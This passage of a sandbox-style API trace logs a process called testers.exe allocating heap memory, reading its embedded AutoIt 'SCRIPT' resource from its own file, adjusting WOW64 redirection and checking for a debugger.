0xba6390 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5230 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5240 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5250 [0265.756] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5648 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5260 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba63b8 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5270 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5660 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5280 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5678 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5290 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5690 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba52a0 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba56a8 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba52b0 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba56c0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba52c0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba56d8 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba52d0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba56f0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba52e0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5708 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba52f0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5720 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5300 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5738 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5310 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5750 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5320 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5768 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5330 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5780 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5340 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5798 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5350 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba57b0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5360 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba57c8 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5370 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba57e0 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5380 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba57f8 [0265.757] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5390 [0265.758] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.758] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.760] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5810 [0265.760] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53a0 [0265.761] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x75f9d8, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0265.761] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xbaa578 [0265.761] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53b0 [0265.765] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x74f9c8, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0265.765] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba5810 | out: hHeap=0xb80000) returned 1 [0265.765] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xbaa5d0 [0265.765] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa578 | out: hHeap=0xb80000) returned 1 [0265.765] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53b0 | out: hHeap=0xb80000) returned 1 [0265.765] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x75f9e4, lpFilePart=0x76f9e4 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x76f9e4*="testers.exe") returned 0x20 [0265.765] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba63e0 [0265.765] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5810 [0265.765] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5828 [0265.765] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53b0 [0265.765] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x76fa00 | out: phkResult=0x76fa00*=0x0) returned 0x2 [0265.766] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba5828 | out: hHeap=0xb80000) returned 1 [0265.766] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53b0 | out: hHeap=0xb80000) returned 1 [0265.766] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.766] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.766] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.767] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5828 [0265.767] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53b0 [0265.767] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.767] IsThemeActive () returned 0x1 [0265.767] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x77fa24, fWinIni=0x0 | out: pvParam=0x77fa24) returned 1 [0265.767] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0265.767] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5840 [0265.768] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53c0 [0265.768] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x76f9f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0265.768] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5858 [0265.768] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53d0 [0265.768] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x74f958, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0265.768] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xbaa578 [0265.768] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53e0 [0265.769] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x73f948, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0265.769] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb93348 | out: hHeap=0xb80000) returned 1 [0265.769] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xbaa628 [0265.769] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa578 | out: hHeap=0xb80000) returned 1 [0265.770] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53e0 | out: hHeap=0xb80000) returned 1 [0265.770] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xb922d0 [0265.770] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53e0 [0265.770] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.770] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0265.770] Wow64DisableWow64FsRedirection (in: OldValue=0x75f95c | out: OldValue=0x75f95c*=0x0) returned 1 [0265.770] FreeLibrary (hLibModule=0x75990000) returned 1 [0265.770] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xbaa578 [0265.770] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x75f7f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0265.771] GetFileType (hFile=0xf8) returned 0x1 [0265.771] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0265.771] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.772] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0265.772] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0265.772] FreeLibrary (hLibModule=0x75990000) returned 1 [0265.772] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10000) returned 0xbaa680 [0265.773] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53f0 [0265.773] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x75f9b8 | out: ppstm=0x75f9b8*=0xba6430) returned 0x0 [0265.774] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0265.774] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0265.774] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0265.774] LockResource (hResData=0x3607b8) returned 0x3607b8 [0265.774] ISequentialStream:RemoteWrite (in: This=0xba6430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0265.775] IStream:RemoteSeek (in: This=0xba6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0265.775] IStream:RemoteSeek (in: This=0xba6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.775] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0xbaa680, cb=0x18, pcbRead=0x75f8e4 | out: pv=0xbaa680*=0xa3, pcbRead=0x75f8e4*=0x18) returned 0x0 [0265.776] IStream:RemoteSeek (in: This=0xba6430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f928, cb=0x4, pcbRead=0x75f8e4 | out: pv=0x75f928*=0x45, pcbRead=0x75f8e4*=0x4) returned 0x0 [0265.776] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53f0 | out: hHeap=0xb80000) returned 1 [0265.776] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa680 | out: hHeap=0xb80000) returned 1 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f94c, cb=0x10, pcbRead=0x75f924 | out: pv=0x75f94c*=0x4d, pcbRead=0x75f924*=0x10) returned 0x0 [0265.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75f820 | out: lpSystemTimeAsFileTime=0x75f820*(dwLowDateTime=0x3fcf8f00, dwHighDateTime=0x1d661be)) [0265.776] IStream:RemoteSeek (in: This=0xba6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.776] IStream:RemoteSeek (in: This=0xba6430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f2a0, cb=0x4, pcbRead=0x75f064 | out: pv=0x75f2a0*=0x6b, pcbRead=0x75f064*=0x4) returned 0x0 [0265.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75ef60 | out: lpSystemTimeAsFileTime=0x75ef60*(dwLowDateTime=0x3fcf8f00, dwHighDateTime=0x1d661be)) [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f2a8, cb=0x4, pcbRead=0x75f064 | out: pv=0x75f2a8*=0xa6, pcbRead=0x75f064*=0x4) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f090, cb=0x34, pcbRead=0x75f064 | out: pv=0x75f090*=0xe1, pcbRead=0x75f064*=0x34) returned 0x0 [0265.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75ef60 | out: lpSystemTimeAsFileTime=0x75ef60*(dwLowDateTime=0x3fcf8f00, dwHighDateTime=0x1d661be)) [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f2a8, cb=0x4, pcbRead=0x75f064 | out: pv=0x75f2a8*=0x17, pcbRead=0x75f064*=0x4) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f2d4, cb=0x6e, pcbRead=0x75f064 | out: pv=0x75f2d4*=0xf9, pcbRead=0x75f064*=0x6e) returned 0x0 [0265.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75ef60 | out: lpSystemTimeAsFileTime=0x75ef60*(dwLowDateTime=0x3fcf8f00, dwHighDateTime=0x1d661be)) [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f95b, cb=0x1, pcbRead=0x75f2ac | out: pv=0x75f95b*=0x0, pcbRead=0x75f2ac*=0x1) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f954, cb=0x4, pcbRead=0x75f2ac | out: pv=0x75f954*=0xbc, pcbRead=0x75f2ac*=0x4) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f954, cb=0x4, pcbRead=0x75f2ac | out: pv=0x75f954*=0xbc, pcbRead=0x75f2ac*=0x4) returned 0x0 [0265.776] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0x75f954, cb=0x4, pcbRead=0x75f2ac | out: pv=0x75f954*=0x84, pcbRead=0x75f2ac*=0x4) returned 0x0 [0265.776] IStream:RemoteSeek (in: This=0xba6430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.776] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xba53f0 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xba5400 [0265.777] ISequentialStream:RemoteRead (in: This=0xba6430, pv=0xba5400, cb=0x0, pcbRead=0x75f2ac | out: pv=0xba5400*=0x6e, pcbRead=0x75f2ac*=0x0) returned 0x0 [0265.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75f1a8 | out: lpSystemTimeAsFileTime=0x75f1a8*(dwLowDateTime=0x3fcfb610, dwHighDateTime=0x1d661be)) [0265.777] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53f0 | out: hHeap=0xb80000) returned 1 [0265.777] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba5400 | out: hHeap=0xb80000) returned 1 [0265.777] CloseHandle (hObject=0xf8) returned 1 [0265.777] IUnknown:Release (This=0xba6430) returned 0x0 [0265.777] FreeLibrary (hLibModule=0x290000) returned 1 [0265.777] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb922d0 | out: hHeap=0xb80000) returned 1 [0265.777] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53e0 | out: hHeap=0xb80000) returned 1 [0265.777] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb93318 | out: hHeap=0xb80000) returned 1 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x50) returned 0xbaa680 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93318 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6430 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53e0 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6458 [0265.777] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93348 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5400 [0265.778] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb93348 | out: hHeap=0xb80000) returned 1 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba64a8 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93348 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5870 [0265.778] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba6430 | out: hHeap=0xb80000) returned 1 [0265.778] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53e0 | out: hHeap=0xb80000) returned 1 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa6f0 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53e0 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa708 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53f0 [0265.778] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6430 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa720 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5410 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa738 [0265.778] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa6f0 | out: hHeap=0xb80000) returned 1 [0265.778] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53e0 | out: hHeap=0xb80000) returned 1 [0265.778] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa6f0 [0265.779] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53e0 [0265.779] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5420 [0265.779] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbaaad8 [0265.779] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5430 [0265.779] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa750 [0265.779] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa6f0 | out: hHeap=0xb80000) returned 1 [0265.779] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba53e0 | out: hHeap=0xb80000) returned 1 [0265.779] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb93318 | out: hHeap=0xb80000) returned 1 [0265.779] IsDebuggerPresent () returned 0 [0265.779] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x73f970, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0265.779] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x73f970, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0265.780] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa628 | out: hHeap=0xb80000) returned 1 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x60) returned 0xbaacf8 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93318 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba53e0 [0265.780] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x73f940, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0265.780] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb93318 | out: hHeap=0xb80000) returned 1 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x60) returned 0xbaad60 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba64d0 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93318 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba64f8 [0265.780] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5440 [0265.780] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.781] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0265.781] Wow64DisableWow64FsRedirection (in: OldValue=0x74f8dc | out: OldValue=0x74f8dc*=0x0) returned 1 [0265.781] FreeLibrary (hLibModule=0x75990000) returned 1 [0265.781] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x74f778, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0265.781] GetFileType (hFile=0xf8) returned 0x1 [0265.781] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0265.783] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.783] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0265.783] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0265.785] FreeLibrary (hLibModule=0x75990000) returned 1 [0265.785] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10000) returned 0xbaadc8 [0265.785] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5450 [0265.785] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x74f90c | out: ppstm=0x74f90c*=0xba6520) returned 0x0 [0265.785] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0265.785] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0265.785] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0265.785] LockResource (hResData=0x3607b8) returned 0x3607b8 [0265.785] ISequentialStream:RemoteWrite (in: This=0xba6520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0265.786] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0265.786] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0xbaadc8, cb=0x18, pcbRead=0x74f864 | out: pv=0xbaadc8*=0xa3, pcbRead=0x74f864*=0x18) returned 0x0 [0265.786] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f8a8, cb=0x4, pcbRead=0x74f864 | out: pv=0x74f8a8*=0x45, pcbRead=0x74f864*=0x4) returned 0x0 [0265.786] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba5450 | out: hHeap=0xb80000) returned 1 [0265.786] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaadc8 | out: hHeap=0xb80000) returned 1 [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f8cc, cb=0x10, pcbRead=0x74f8a4 | out: pv=0x74f8cc*=0x4d, pcbRead=0x74f8a4*=0x10) returned 0x0 [0265.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f7a0 | out: lpSystemTimeAsFileTime=0x74f7a0*(dwLowDateTime=0x3fd115a0, dwHighDateTime=0x1d661be)) [0265.786] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.786] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f220, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f220*=0x6b, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74eee0 | out: lpSystemTimeAsFileTime=0x74eee0*(dwLowDateTime=0x3fd115a0, dwHighDateTime=0x1d661be)) [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f228, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f228*=0xa6, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f010, cb=0x34, pcbRead=0x74efe4 | out: pv=0x74f010*=0xe1, pcbRead=0x74efe4*=0x34) returned 0x0 [0265.786] 